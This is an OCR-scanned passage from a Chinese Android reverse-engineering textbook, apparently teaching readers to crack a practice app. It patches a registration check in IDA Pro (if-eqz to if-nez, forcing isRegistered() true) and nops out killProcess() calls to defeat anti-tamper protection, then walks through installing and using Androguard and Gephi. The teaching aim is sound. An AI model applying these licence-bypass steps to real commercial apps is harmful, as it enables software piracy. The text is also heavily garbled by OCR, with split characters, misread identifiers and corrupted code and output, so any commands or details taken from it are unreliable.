所 示 ， 可 粗略 判断 出 每 个 方法 的 作用 。 




















到 | Buildconfig.<init2@Y 0002D028 2974 





Ba NainkActivity$1. <init»YL 00020040 
| Nainhctivity$l. onClickaVL 0002D05C 2976 
| [| 台 | Nainhectivity$2. Sinit YL 0002D078 2977 
| [| 驶 | Nainhctivity$2. onCli ckayL 0D002D094 2978 
wh| Nainhctivity$SHChecker. Sinit VLL D002DO0FC 2979 
| Nainhctivity$SHChecker. 1sReglisteredaz 0002D11C 2980 
wD| Nainhctivity. <init GY 0002D200 2981 
2p| Nainhctivity. access$OBYL O002D218 2982 
水 | Mainhctivity. access$1@LL 00020230 2983 
| [到 | NairActivity. getAnnotations@Yy 00020248 2985 
28) Nainhctivity. onCreate@YyL 0002D0384 2987 
| | 总 | NainActivity. onCreateDptionsMenuBzL D002D410 2988 


图 5-9 ”定位 MainActivity 


下 面 我 们 来 尝试 破解 一 下 crackme0502.apk。 首 先 安装 运行 apk 程 
序 ， 程 序 运 行 后 有 两 个 按钮 ， 点 击 “ 获 取 注 解 ” 按 钮 会 Toast 弹 出 3 条 信 
忌 。 在 文本 框 中 输入 任何 字符 串 后 ， 点 击 “ 检 测 注 册 码 ”按钮 ， 程 序 弹 出 
注册 码 错 误 的 提示 信息 。 这 里 我 们 以 按钮 事件 响应 为 突破 口 来 查找 关 键 
代码 ， 通 过 图 5-9 我 们 可 以 发 现 有 两 个 名 为 OnClick() 的 方法 ， 那 具体 是 
哪 一 个 呢 ? 我 们 分 别 进去 看 看 。 前 者 调用 了 MainActivity.access$00) 方 
法 ， 在 IDA Pro 的 反 汇 编 界 面 双击 MainActivity_access 可 以 看 到 它 其 实 调 
用 了 MainActivity 的 getAnnotations0) 方 法 ， 看 到 这 里 应 该 可 以 明白 ， 
MainActivity$1.onClick() 方 法 是 前 面 按钮 的 事件 啊 应 代码 。 接 下 来 查看 
MainActivity$2.onClick() 方 法 ， 双 击 代 码 行 ， 来 到 相应 的 反 汇 编 代码 
处 ， 按 下 空格 键 切 换 到 IDA Pro 的 流程 视图 ， 如 图 5-10 所 示 ， 代 码 的 “分 
水 岭 *” 就 是 “if-eqz v2，loc_2D0DC”。 图 中 左边 红色 箭头 表示 条 件 不 满足 
时 执行 的 路 线 ， 右 边 的 绿色 箭头 是 条 件 满足 时 执行 的 路 线 。 

















Method 2978 (8xba2): 

public void 

com.droider .crackme8582.MainActivity$2.onClick( 

android.view.View p8) 

this = vb 

p98 = v5 

new-instance vg, <t: MainActivity$SNChecker> 
v2, this, MainActivity$2 this$8 
v3, this, MainActivity$2 this$8 


{uv3}, <ref MainActivity.access$1(ref) Mainfctivity access$1@LL> 
v3 


{v3}, <ref EditText.getText() imp. @ def EditText getText@L> 
v3 

{v3}, <ref Editable.toString() imp. @ def Editable toSstring@L> 
v3 


{v8, v2, v3}, <void MainActivity$SNChecker .<init>(ref, ref) MainActivity$SNChecker _init_GBULL> 
{v8}, <boolean HainActivity$SNChecker .isRegistered() HainActivity$SNChecker isRegistered@z2> 

v2 

v2, loc_ 2D8DC 


























一 |1loc_2D6Dc: 咱 镰 便 坡 
const-string v1, aClxjncabsfsspp 
loc 2D8C6 





goto 
Method End 


v2, ES MainActivity$2 this$8 
v3, 


2 人 u3》, 《ref Toast.makeText(ref, ref, int) imp. @ _def Toast makeText@LLLI> 


invoke-virtual oy <void Toast.show() imp. @ def_Toast show@Uu> 


locret: 
return-void 


图 5-10”IDA Pro 的 流程 视图 


虽然 不 知道 这 堆 乱 码 字 符 串 分 别 是 什么 ， 但 通过 最 后 调用 的 Toast 
来 看 ， 直 接 修改 if-eqz 即 可 将 程序 破解 。 将 鼠标 定位 到 指令 of -eqdz V2, 
loc_2D0DC” 所 在 行 ， 然 后 点 击 IDA Pro 主 界面 的 “Hex View-A” 选 项 卡 ， 
可 看 到 这 条 指令 所 在 的 文件 偏 移 为 0x*2?DOBE， 相 应 的 字 节 码 为 “38 02 0f 
00”， 通 过 前 面 的 学 习 ， 我 们 知道 只 需 将 让 eqz 的 OpCode 值 38 改 成 if-nez 
的 OpCode 值 39 即 可 。 说 干 说 干 ， ee 
0x2D0BE 的 38 改 为 39， 然 后 保存 退出 。 接 着 按照 本 书 4.6 小 节 的 介 
将 dex 文 件 进行 Hash 修 复 后 导入 apk 文 件 ， 1 
现 程 序 已 经 破解 成 功 了 。 

为 了 让 读者 看 到 一 种 常见 的 Android 程 序 的 保护 手段 ， 这 里 更 换 一 
下 破解 思路 。 通 过 图 5-10 可 发 现 ，MainActivity$SNChecker.isRegistered() 
方法 实际 上 返回 一 个 Boolean 值 ， 通 过 判断 它 的 返回 值 来 确定 注册 码 是 





否 正 确 。 现 在 的 问题 是 ， 如 果 该 程序 是 一 个 大 型 的 Android 软 件 ， 而 且 
调用 注册 码 判 断 的 地 方 可 能 不 止 一 处 ， 这 种 情况 时 ， 通 常 有 两 种 解决 方 
法 : 第 一 种 是 使 用 IDA Pro 的 交叉 引用 功能 查找 到 所 有 方法 被 调用 的 地 
方 ， 然 后 修改 所 有 的 判断 结果 ; 第 二 种 方法 是 直接 给 isRegistered() 方 
法 “动手 术 ”， 让 它 的 结果 永远 返回 为 真 。 很 显然 ， 第 二 种 方法 解决 问题 
更 利落 ， 而 且 一 盘 永 逸 。 

下 面 答 试 使 用 这 种 方法 进行 破解 ， 首 先 按 下 空格 键 切换 到 反 汇 编 视 
图 ， 发 现 直 接 修改 方法 的 第 二 条 指令 为 “return v9” 即 可 完成 破解 ， 对 应 
机 器 码 为 “OF 09”， 将 其 修改 完成 后 重新 修复 与 签名 ， 安 装 测 试 发 现 程 序 
启动 后 就 立即 退出 了 。 这 时 最 先 怀疑 的 是 程序 是 否 修改 正确 ， 使 用 IDA 
Pro 重 新 导入 修改 过 的 classes.dex 文 件 ， 发 现 修改 的 地 方 没 错 ， 看 来 是 程 
序 采 取 了 某 种 保护 措施 ! 回想 一 下 前 面 提 到 的 两 种 程序 退出 方法 : 
Context 的 finish() 方 法 与 android.os.Process 的 killProcess() 方 法 ， 按 下 快捷 
键 CTRL+S 并 双击 CODE 回 到 代码 段 ， 接 着 按 下 快捷 刍 ALT+T 搜 索 finish 
与 killProcess， 最 后 在 MyApp 类 的 onCreate() 方 法 中 找到 了 相应 的 调用 ， 
得 看 相应 的 反 汇 编 代 码 ， 发 现 这 段 代 码 使 用 Java 的 反射 机 制 ， 手 工 调用 
isRegistered() 方 法 检查 字符 串 “11111” 是 否 为 合法 注册 码 ， 如 果 是 或 者 调 
用 isRegistered() 失 败 都 说 明 程 序 被 修改 过 ， 从 而 调用 killProcess() 来 杀 死 
进程 。 明 白 了 保护 手段 ， 解 诀 方 法 就 简单 多 了 ， 直 接 将 两 处 killProcess() 
的 调用 直接 nop 挥 (修改 相应 地 方 的 指令 为 0) 就 可 以 了 。 














5.7 ”恶意 软件 分 析 工 具 包 一 -Androguard 


对 于 Android 恶 意 软 件 分 机 人 员 来 说 ， 提 起 Androguard 应 该 不 会 感到 
陌生 ，Androguard 提 供 了 一 组 工具 包 来 辅助 分 析 人 员 快 速 鉴别 与 分 析 
APK 文 件 。 


5.7.1 Androguard 的 安装 与 配置 


Androguard 的 安装 过 程 比较 复杂 ， 而 且 容易 出 错 ， 作 者 上 自己 制作 了 
一 个 安装 有 Androguard 的 Ubuntu 系统 镜像 ARE (Android Reverse 
Engineering) 供用 户 下 载 使 用 ， 不 过 就 目前 来 次，ARE 默 认 安 装 的 
Androguard 版 本 过 低 ， 作 者 又 没有 更 新 ， 已 经 失去 了 使 用 的 价值 。 

目前 Androguard 最 新 版 本 为 1.6， 笔 者 以 Ubuntu 10.04 演 示 ， 其 安装 
方法 如 下 s 

自 先 下 载 版 本 控制 软件 ， 用 来 下 载 工具 源码 。 执 行 以 下 命令 : 

sudo apt-get install subversion mercurial git-core 

安装 下 载 工具 wget 与 解压 工具 unzip: 

sudo apt-get install wget unzip 

安装 setuptools: 

cd ~/Downloads 


wget http://pypi.python.org/packages/2.6/s/setuptools/setuptools-0.6c11- 
py2.6.egg 

chmod a+x setuptools-0.6c11-py2.6.egg 

sudo ./setuptools-0.6c11-py2.6.egg 

安装 依赖 库 : 

sudo apt-get install python2.6-dev python-bzutils libbz2-dev libmuparser-dev 
libsparsehash-dev 

python-ptrace python-pygments graphviz liblzma-dev libsnappy-dev 


安装 pydot: 


cd ~/Downloads 

svn checkout http://pydot.googlecode.com/svn/trunk/ pydot 
cd pydot 

sudo python setup.py instal 

安装 psyco: 

cd ~/Downloads 

svn co http://codespeak.net/svn/psyco/dist/ psyco 
cd psyco 

sudo python setup.py install 

安装 networkx: 

cd ~/Downloads 

git clone https://github.com/networkx/networkx.git 
cd networkx 


sudo python setup.py install 
安装 IPython (注意 ; 最 好 使 用 easy_install 安 装 ， 避 人 免 IPython 版 本 冲 


sudo easy_install ipython 

Pe 

安装 Chilkat: 

cd ~/Downloads 

wget http://www.chilkatsoft.com/download/chilkat-9.3.2-python-2.6-i686 
-linux.tar.gz 

sudo tar zxvf chilkat-9.3.2-python-2.6-i686-linux.tar.gz -C / 

Psy 六 

安装 python-magic: 

cd ~/Downloads 

git clone git://github.com/ahupp/python-magic.git 

cd python-magic 

sudo python setup.py install 

Pe 

安装 pyfuzzy: 

cd ~/Downloads 

wget http://nchc.dl.sourceforge.net/project/pyfuzzy/pyfuzzy/pyfuzzy-0.1.0 
/pyfuzzy-0.1.0.tar.gz 

tar zxvf pyfuzzy-0.1.0.tar.gz 


cd pyfuzzy-0.1.0 
sudo python setup.py install 


安装 Androguard: 
hg clone https://androguard.googlecode.com/hg/ androguard 


下 载 完 Androguard 源 码 后 ， 打 开 androguard 目 录 下 的 


elsim/elsign/formula/Makefile 文 件 ， 在 CFLAGS 声 明 处 添加 如 下 代码 : 
CFLAGS += -I/usr/include/muParser 


打开 androguard 目 录 下 的 elsim/elsign/libelsign/Makefile 文 件 ， 在 
CFLAGS 声 明 处 添加 如 下 代码 : 


CFLAGS += -I/usr/include/muParser -I/usr/include/python2.6 

修改 完成 后 在 终端 提示 符 下 进入 androguard 目 录 并 执行 make， 
Androguard 就 安装 配置 完成 了 。 

最 后 说 下 安装 Mercury，Mercury 需 要 Python 2.7 运 行 环境 ， 笔 者 
Ubuntu 10.04 的 Python 2.6 无 法 运行 它 ， 这 里 的 安装 只 做 演示 ， 读 者 在 安 
装 有 Python 2.7 的 环境 下 使 用 下 面 的 命令 安装 即 可 。 


cd <Androguard 日 录 > 





mkdir mercury 
wget http://labs.mwrinfosecurity.com/assets/299/mercury-vl.1.zip 


unzip mercury-v1.1.zip 

在 安装 Androguard 的 时 候 ， 各 个 依赖 库 的 版 本 差异 与 网 络 环境 都 有 
可 能 导致 安装 失败 ， 随 着 Androguard 版 本 的 不 断 更 新 ， 其 依赖 库 也 有 可 
能 发 生变 化 ， 笔 者 无 法 保证 上 述 的 安装 方法 能 够 适应 您 的 操作 系统 ， 读 
者 可 以 严格 按照 Androguard 项 目的 wiki 安装 页 的 说 明 进 行 安装 配置 ， 网 
址 是 : http://code.google.com/p/androguard/wiki/Installation。 


5.7.2 Androguard 的 使 用 方法 





Androguard 中 提供 的 每 个 工具 都 是 一 个 独立 的 py 文件 ， 我 以 上 一 节 
中 的 crackme0502.apk 与 破解 后 的 crackme0502_cracked.apk 为 例 ， 来 讲解 
名 们 的 使 用 方法 

e androapkinfo.py 


androapkinfo.py 用 来 查看 apk 文 件 的 信息 。 该 工具 会 输入 apk 文 件 的 
包 、 资 源 、 权 限 、 组 件 、 方 法 等 信息 ， 输 出 的 内 容 比 较 详细 ， 建 议 使 用 





时 将 输出 信息 重 定 回 到 文件 后 再 进行 查看。 使 用 方法 : 


./androapkinfo.py -i ./crackme0502 .apk 
命令 执行 后 输出 信息 如 下 。 


./androapkinfo.py -i ./crackme0502 .apk 

crackme0502.apk : 

FILES: 

res/layout/activity_ main.xml Android's binary XML -51d837ba 
res/menu/activity_main.xml Android's binary XML 2471e50a 
AndroidManifest.xml Android's binary XML b5b7132 
resources.arsc data 2a26ed’7f 


res/drawable-hdpi/ic action search.png PNG image, 48 x 48, 8-bit colormap, 


non-interlaced 64275be8 

MAIN ACTIVITY: com.droider.crackme0502.MainActivity 

ACTIVITIES: ['com.droider.crackme0502 .MainActivity'] 

SERVICES: [] 

RECEIVERS: [] 

PROVIDERS: [] 

Native code: False 

Dynamic code: False 

Reflection code: True 

Leom/droider/crackme0502/MainActivity; <init> ['ANDROID', 'APP'] 
Lcom/droider/crackme0502/MainActivity; getAnnotations ['ANDROID', 


'WIDGET' ] 


Lecom/droider/crackme0502/MainActivity; onCreate ['ANDROID', 'WIDGET', 'APP'] 


Lecom/droider/crackme0502/MainActivity; onCreateOptionsMenu ['ANDROID', 


Lecom/droider/crackme0502/MyApp; <init> ['ANDROID', '‘'APP'] 
Lecom/droider/crackme0502/MyApp; onCreate ['ANDROID', 'OS', 'APP'] 


e androaxml.py 





'VIEW' ] 


androaxml.py 用 来 解密 apk 包 中 的 AndroidManifest.xml 文 件 。 使 用 方 


./androaxml .py -1 ./crackme0502.apk 


和 输出 结果 如 下 。 


./androaxml .py -i ./crackme0502 .apK 
<?xml] version="1.0" ?> 
<manifest android:versionCode="1" android:versionName="1.0" 
package="com.droider.crackme0502" 
xmlns:android="http://schemas.android.com/apk/res/android"> 
<uses-sdk android:minSsdkVersion="8" android:targetSsdkVersion="]15"> 
</uses-sdk> 
<application android:debuggable="true" android:icon="@7F020001" 
android:1label="@7F050000" android:name=".MyApp" android:theme= 
"@7F060000"> 
<activity android:1label="@7F050003" android:name=" .MainActivity"> 
<intent-filter> 
<action android:name="android.intent.action.MAIN"> 
</action> 
<category android:name="android.intent.category .LAUNCHER"> 
</category> 
</intent-filter> 
</activity> 
</application> 


</manifest> 


©e androcsign.py 
androcsign.py 用 于 添加 apk 文 件 的 签名 信息 到 一 个 数据 库 文 件 中 。 
Androguard 工 具 目 录 下 的 signatures/dbandroguard 文 件 为 收集 的 恶意 软件 
言 朋 数据库。 在 开始 使 用 androcsign.py 前 需要 为 apk 文 件 编写 一 个 sign 文 
件 ， 这 个 文件 采用 json 格 式 保存 。 下 面 是 笔者 编写 的 crackme0502.apk 的 
sign 文 件 crackme0502.sign 的 内 容 


"SAMPLE":"apks/crackme0502 .apk" 


"BASE": "AndroidoOs", 
"NAME" : "DroidDream", 
"SIGNATURE" : [ 
{ 
TYPpE "METHOIM". 
"CN":"Lcom/droider/crackme0502/MainaActivity$SNChecker;", 
"MN":"isRegistered", 
TO 


SAMPLE 指 定 需 要 添加 信息 的 apk 文 件 。BASE 指 定 文 件 运 行 的 系 
统 ， 目 前 固定 为 AndroidoOS。NAME 是 该 签名 的 名 字 。SIGNATURE 为 
具体 的 签名 规则 ， 其 中 TYPE 用 来 指定 签名 的 类 型 ，METHSIM 表 示 的 是 
方法 的 签名 ， 此 外 还 有 CLASSSIM 表 示 为 类 签名 ;CN 用 来 指定 方法 所 
在 的 类 ; MN 指定 了 方法 名 ; DD 指定 了 方法 的 签名 信息 。BF 用 来 指定 签 
名 的 检测 规则 ， 可 以 同时 满足 1 条 或 多 条 ， 例 如 ， 使 用 SIGNATURE 定 义 
了 3 条 签名 规则 ， 当 软件 的 代码 同时 满足 规则 1 或 规则 2 且 满 足 规则 3 时 说 
明 样本 符合 检测 条 件 ， 那 么 BF 可 定义 为 “"BF" : "(0 or 1) and 2"”。 

在 Androguard 目 录 下 新 建 一 个 apks 目 录 ， 将 crackme0502.apk 复 制 进 
去 ， 然 后 将 crackme-0502.sign 文 件 复 制 到 Androguard 的 signatures 目 录 
下 ， 在 终端 提示 符 下 执行 下 面 的 命令 : 


./androcsign.py -i signatures/crackme0502.sign -o signatures/dbandroguardqd 


命令 执行 后 crackme0502.apk 的 信息 束 存 入 dbandroguard 数 据 库 了 ， 
输出 信息 如 图 5-11 所 示 。 




















HO@O@ android@ubuntu10: ~/tools/androguard 


File Edit View Terminal Help 


android@ubuntul0:~/tools/androguards$s 

androidGubuntu16:~/tooLs/androguard$ ./androcsign.py -i signatures/crackme0502.s 
ign -0 signatures/dbandroguard 
B[F9I]B[F9Pl{fLjava/Lang/String;Length()I}I]B[]B[R]B[F9P1l1{Ljava/Lang/String;Lengt 
h()I}I]B[F9Pl{fLjava/tLang/String;charAt(I)C}+6]8[]B8[I]B[F9P1{Ljava/Lang/String;cha 
rAt(I)C}G]B[]B[G]B[G]B[G]B[I]B[]B[I]B[I]B[]B[G]B[FeOP1{Ljava/lang/String;charAt (I 
)C}G]BLG]B[] 

[{u'DroidDream': [[[90, 'QLtGMELdQLtGMFAxeQxqYXZhL2xhbmcvU3RyaW5n02xlbmd8eaCgpSX1] 
XUJbXuUJbUtLICW9YwUDF7TGphdmEvbGFuZzy9TdHJpbmc7bGVuZ3RoKkCLJfULdQtLtGMFAxeg9xqYXZzhL2xh 
bmcvU3RyaW5n02NoYX]JBdChJKUN9R11LICW11LICW9LdQLtGMFAxe9xqYXZzhL2xhbmcvU3RyaW5n02NoYXJB 
dChJKUN9R11CW11CW6ddQLtHXUJbR11CW6LdQLtdQLtJXU]JbSV1CW11CW6ddQtLtGMFAxe9xqYXZzhL2xh 
bmcvU3RyawW5n02NoYXJBdChJKUN9R11CwWoddQLtd' ，1.9，4.455759967518712，4.53904268152 
44052, 9.90]], u'a’']}] 

androidGubuntu16:~/toots/androguards$ | | 





图 5-11 androcsign.py 执 行 效 果 


e@ androdd.py 
androdd.py 用 来 生成 apk 文 件 中 每 个 类 的 方法 的 调用 流程 图 。 使 用 方 





./androdd.py -i ./crackme0502 .apk -Oo ./out -Q -f PNG 

这 里 需要 使 用 -o 选 项 强制 指定 一 个 输入 目录 ，-d 指 定 生 成 dot 图 形 文 
件 ，-f 用 来 指定 输出 的 图 片 格式 ， 可 以 是 PNG 或 JPG。 不 过 在 笔者 的 
Ubuntu 10.04 上 ， 该 工具 并 没有 很 好 的 工作 。 

e androdiff.py 

androdiff.py 用 来 比较 两 个 apk 文 件 的 差异 。 使 用 方法 如 下 : 


./androdiff.py -i ./crackme0502.apk ./crackme0502_ cracked.apk 


命令 执行 后 输出 结果 如 下 。 


/androdiff.py -i ./crackme0502 .apk ./crackme0502_cracked .apk 
[ ('Lecom/droider/crackme0502/MainActivity$2;', ‘'onClick', 
' (Landroid/view/View;)V') |] 
<-> [ ('Lcom/droider/crackme0502/MainActivity$2;', 'onClick', 
' (Landroid/view/View;)V') | 
onClick-BB@0x0 onClick-BB@0x0 
Added Elements(1) 
O032 :TZ Tf -Dez V2 ES 
Deleted Elements!(1) 
0x32 "12. 1f=eqz v2 中 15 
Elements: 
IDENTICAL: 3 
SIMILAR: 上 
NEW : 0 
DELETED: 0 
SKIPPED: 0 
NEW METHODS 
DELETED METHODS 
通过 结果 可 以 发 现 ，androdiff 分 析出 了 两 个 apk 之 间 的 差异 ， 
MainActivity$2 类 的 onClick() 方 法 中 有 一 行 代码 不 同 。 
e androdump.py 
androdump.py 用 来 dump 一 个 Linux 进 程 的 信息 。 使 用 方法 如 下 。 
./androdump.py 一 Pid 


pid 为 一 个 Linux 进 程 的 D， 该 工具 使 用 的 时 候 较 少 ， 这 里 就 不 做 介 





e@ androgexf.py 
androgexf.py 用 来 生成 APK 的 GEXF 格 式 的 图 形 文件 。 该 文件 可 以 使 
用 Gephi 查 看 。 使 用 方法 : 


./androgexf.py -i ./crackme0502.apk -o ./crackme0502 .gexf 
命令 执行 完 后 会 在 crackme0502.apk 目 录 下 生成 crackme0502.gexf， 


gexf 是 图 形 数据 文件 ， 可 以 使 用 Gephi 打 开 ， 关 于 Gephi 的 详细 使 用 方法 


将 在 下 一 小 节 介绍 。crackme0502.gexf 打 开 后 效果 如 图 5-12 所 示 
i gy 


(已 Gephi 0.8.1 beta - Project 0 
文件 区 ) 工作 区 视图 他) 工具 CI) 窗口 世 ) 插件 帮助 过) 
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图 5-12 ”使 用 Gephi 查 看 GEXF 文 件 


e androlyze.py 

androlyze.py 提 供 了 一 个 交互 环境 方便 分 机 人员 静 态 分 析 Android 程 
序 ， 该 工具 的 功能 非常 强大 ， 而 且 涉 及 的 内 容 较 多 ， 详 细 的 用 法 将 在 
5.7.4 闻 介绍 。 

e andromercury.py 

andromercury.py 是 Mercury 工 具 的 框架 。 功 能 上 是 对 Mercury 的 包 
装 ，Mercury 需 要 的 Python 版 本 为 2.7， 此 处 不 展示 该 工具 ，Mercury 工 具 
的 详细 使 用 方法 会 在 本 书 的 第 11 章 进行 介绍 。 

© androrisk.py 


androrisk.py 用 于 评估 apk 文 件 中 潜在 的 风险 。 使 用 方法 如 下 。 
./androrisk.py -m -i ./crackme0502.apk 


-mm 选项 表明 需要 分 析 apk 中 的 每 一 个 方法 ， 命 令 执行 后 效果 如 图 5- 
13 上 所 示 。 





OO androida@ubuntu10: ~/tools/androguard 


File Edit View Terminal Help 


android@ubuntul0:~/tools/androguards$ 
androidGubuntu16:~/toots/androguard$ ./androrisk.py -m -i ./crackme8502.apk 
./crackme0502 .apk 
RedFlags 
DEX {'NATIVE': ©@, ‘DYNAMIC': 6， "CRYPT0' : 6， 'REFLECTION': 
APK {'DEX': 08, 'EXECUTABLE': 8, 'ZIP': 0, 'SHELL SCRIPT': 9, 
'SHARED LIBRARIES': 0} 
PERM {'PRIVACY' : 6， 'NORMAL': ©, 'MONEY' : O09, 'INTERNET': 6， 
DANGER0US " : 968，“'SIGNATUREORSYSTEM'" : 6，“'CALL' : 6，“ “SIGNATURE ': 686， 
9 
FuzzyRisk 
VALUE 0.6 
androidGubuntu16:~/toots/androguard$ | 








图 5-13 ”androrisk.py 执 行 效 果 


从 输出 结果 来 看 ，crackme0502.apk 中 没有 发 现 风险 ， 唯 独 有 一 项 
REFLECTION 的 值 为 1， 表 示 程 序 中 有 使 用 到 Java 反 射 技术 。 

© androsign.py 

androsign.py 用 于 检测 apk 的 信息 是 否 存 在 于 特定 的 数据 库 中 ， 它 的 
作用 与 androcsign.py 恰 好 相反 。 使 用 方法 : 


./androsign.py -i apks/crackme0502.apk -b signatures/dbandroguard -c 








signatures/dbconfig 


© androsim.py 
androsim.py 用 于 计算 两 个 apk 文 件 的 相似 度 ， 它 是 唯一 一 个 有 
Windows 移 植 版 的 工具 ，Windows 平 台 上 该 工具 为 androsim.exe， 使 用 方 
法 为 : 
./androsim.py -i ./crackme0502.apk ./crackme0502_cracked.apk 


命令 执行 后 输出 结果 如 下 。 


Elements: 
IDENTICAL: Eg 
SIMILAR: i 
NEW : 0 
DELETED: 0 
SKIPPED: 0 
--> methods: 99.983498% of similarities 


可 以 看 到 两 个 程序 的 相似 度 为 99.983498%。 


©e androxgmml.py 
androxgmml.py 用 来 生成 apk/jar/class/dex 文 件 的 控制 流程 及 功能 调用 
图 ， 输 出 格式 为 xgmml。 使 用 方法 如 下 。 


./androxgmml .py -i ./crackme0502 .apk -o crackme0502 .xgmml 

不 过 很 可 惜 的 是 ， 目 前 不 管 是 在 Ubuntu 10.04， 还 是 Ubuntu 12.04 上 
使 用 该 功能 ， 都 会 运行 错误 ， 并 输出 以 下 错误 提示 : 

AttributeError: DVMBasicBlock instance has no _ attribute 'get_ins' 

后 者 笔者 发 现 这 是 Androguard 的 一 个 bug， 和 截止 到 笔者 编写 完 
章 ， 该 bug 都 还 没 出 解决 方案 。 

© apkviewer.py 

apkviewer.py 用 来 为 apk 文 件 中 每 一 个 类 生成 一 个 独立 的 graphml 图 形 
区 忻 汪 使 用力 人 0 下 


./apkviewer.py -1 ./crackme0502.apk -o output 

命令 执行 完 后 ， 可 以 使 用 Gephi 打 开 生 成 后 的 graphml 文 件 ， 不 过 图 
形 中 的 每 个 节点 是 指令 级 别 的 ， 在 但 看 时 效果 没有 方法 级 别 的 gexf 文 件 
直观 。 





5.7.3 ”使 用 Androguard 配 合 Gephi 进 行 静 态 分 析 


Androguard 可 以 生成 Java 方 法 级 与 Dalvik 指 令 级 的 图 形 文 件 ， 配 合 
Gephi 工 具 碍 看 图 形 文 件 ， 可 以 快速 地 了 解 程序 的 执行 流程 ， 在 静态 分 


析 Android 程 序 时 ， 这 个 功能 非常 方便 。 

下 面 我 们 以 crackme0502.apk 为 例 ， 介 绍 如 何 使 用 Gephi 来 静态 分 析 
它 。 首 先 下 载 Gephi 程 序 ，Gephi 是 开源 的 ， 文 持 Mac 
OSX/Windows/Linux 三 种 平台 ， 目 前 最 新 版 本 为 0.8.1 beta， 笔 者 演示 时 
下 载 的 是 Windows 版 本 的 安装 程序 ， 顺 利安 装 完 成 后 启动 界面 如 网 5-14 
所 示 。 
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图 5-14 ”Gephi 启 动 界面 


点 击 荣 单项 “文件 ~ 打开”， 选 择 上 一 人 小节 使 用 Androguard 生 成 的 
crackme0502.gexf，Gephi 会 分 析出 gexf 文 件 的 版 本 为 1.2， 然 后 点 击 确定 
按钮 进入 图 形 显示 界面 。 在 流程 中 选择 “Yifan Hu”， 然 后 点 击 运 行 按钮 
来 生成 分 析 图 ， 如 图 5-15 所 示 。 
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图 5-15 ”生成 分 析 图 


分 析 图 生成 完毕 后 ， 扣 击 图 形 下 方 的 “T” 按 钮 显示 标签 (label) 的 
内 容 ， 然 后 拖 动 劳 边 的 两 个 滑 块 来 调整 连接 线 的 粗细 与 文本 的 字体 大 
小 ， 如 图 5-16 所 示 ， 左 边 的 背 块 用 来 调整 节点 与 节 扣 之 间 连 接线 的 粗 
细 ， 右 边 的 滑 块 用 来 调整 文本 的 字体 大 小 。 
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图 5-16 ”调整 连接 线 与 文本 大 小 
接 下 来 点 击 Gephi 沫 单 栏 下 方 的 “数据 资料 “按钮 ， 切 换 到 “数据 资 
料 ” 选 项 卡 ， 在 过 沽 标签 劳 边 的 文本 框 中 输入 “OnCreate” 碍 找 所 有 
OnCreate() 方 法 ， 结 果 如 图 5-17 所 示 。 


[jp > |> 
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图 5-17 ”查找 OnCreate() 方 法 


结果 中 的 第 一 条 记录 就 Mellie OnCreate()， 在 第 一 条 记录 
上 点 击 右 键 ， 选 择 末 单项 “在 概述 选择 ”( 这 个 Gephi 的 中 文 翻译 有 些 别 

扭 ， 其 含义 应 该 是 “在 概览 图 中 选中 >) ， 然 后 点 击 末 单 下 方 的 概览 按 
钮 ， 切 换 到 图 形 显 示 页 面 ， 发 现 ACTIVITY 节 点 与 OnCreate 节 点 ， 以 及 
它们 之 间 的 连接 线 都 是 绿色 的 ， 将 鼠标 放 在 OnCreate 节 点 上 ， 可 以 看 到 
它 向 下 关联 了 MainActivity$1.<init>、findViewById、setContentView、 
MainActivity$2.<init> 共 4 个 节点 ， 拖 动 所 有 的 节点 调整 至 合适 位 置 
效果 如 图 5-18 所 示 ，MainActivity 在 OnCreate(0) 方 法 中 执行 了 哪些 内 

一 目 了 然 。 
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图 5-18 ”OnCreate() 方 法 的 执行 流 得 


按照 上 面 的 步骤 ， 我 们 来 查看 OnClick(0) 方 法 的 节点 ， 找 到 
MainActivity$2 的 OnClick() 方 法 ， 然 后 在 记录 上 点 击 右键 选择 “编辑 节 
点 ”， 在 颜色 一 栏 将 其 修改 为 “[255,0,0]”， 设 置 节点 为 红色 ， 然 后 如 法 炮 
制 的 设置 OnClick 方 点 的 连接 线 连接 的 几 个 节点 ， 最 后 在 设置 
isRegistered 节 点 时 ， 将 其 尺寸 调整 为 15.0， 最 后 效果 如 图 5-19 所 示 。 
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图 5-19 ”MainActivity$2 的 OnClick() 方 法 


点 击 Gephi 的 沫 单项 “文件 -保存 ”， 将 修改 后 的 gexf 文 件 存 为 
crackme0502.gephi， 方 便 以 后 查看 。 可 以 发 现 ， 使 用 Gephi 分 析 apk 文 件 
比 IDA _ Pro 分析 还 要 直观 。 除 了 简单 的 显示 方法 调用 外 ，Gephi 还 有 很 多 
强大 的 功能 ， 这 些 就 留 给 读者 自己 慢 慢 去 挖掘 了 。 








5.7.4 使 用 androlyze.py 进 行 静 态 分 析 


Androguard 工 具 包 中 的 androlyze.py 与 其 它 的 py 文件 不 同 ， 它 不 是 单 
一 功能 的 脚本 ， 而 是 一 个 强大 的 静态 分 析 工 具 ， 它 提供 的 一 个 独立 的 
Shell 环 境 来 辅助 分 析 人 员 执 行 分 析 工 作 。 

在 终端 提示 符 下 执行 “./androlyze.py-s” 会 进入 androlyze 的 Shell 交 互 
环境 ， 分 析 人 员 可 以 在 其 中 执行 不 同 的 命令 ， 来 满足 不 同情 况 下 的 分 析 
需求 。androlyze.py 通 过 访问 对 象 的 字段 与 方法 的 方式 来 提供 反馈 结果 ， 








分 析 人 E 会 用 到 3 个 对 象 : apk 文 件 对 象 、dex 文 件 对 象 、 分 析 结 
果 对 象 。 这 3 个 对 象 是 通过 androlyze.py 的 Shell 环 境 〈 以 下 简称 Shell 环 
境 ) 来 获取 的 。 首 先是 apk 文 件 对 象 ， 以 5.2 小 节 的 crackme0502.apk 为 


例 ， 在 Shell 环 境 下 执行 以 下 命令 : 
a = APK("./crackme0502 .apk") 


APK0 方 法 返回 一 个 apk 文 件 对 象 ， 并 赋值 给 a。androlyze.py 的 使 用 
有 一 个 技巧 ， 就 是 在 输入 对 象 名 后 加 上 一 个 点 “”， 然 后 按钮 Tab 键 ， 终 
问 提 示 符 下 显示 该 类 所 有 的 方法 与 字段 ， 输 入 部 分 方法 或 字段 名 按 Tab 
键 ， 终 端 提示 符 会 补 全 提示 。 如 图 5-20 所 示 。 
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android@ubuntu196:~/tools/androguard$ ./androlyze.py -5 
Androlyze version 1.6 
1]: a = APK("./crackme9562.apk") 
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图 5-20 ”apk 文 件 对 象 可 用 的 方法 


接着 是 dex 文 件 对 象 的 获取 ， 执 行 以 下 命令 


Q = DalvikVvMFormat (a.get_ dex()) 





DalvikVMFormat() 执 行 后 会 返回 一 个 dex 文 件 对 象 ， 它 的 可 用 方法 


如 图 5-21 所 示 。 
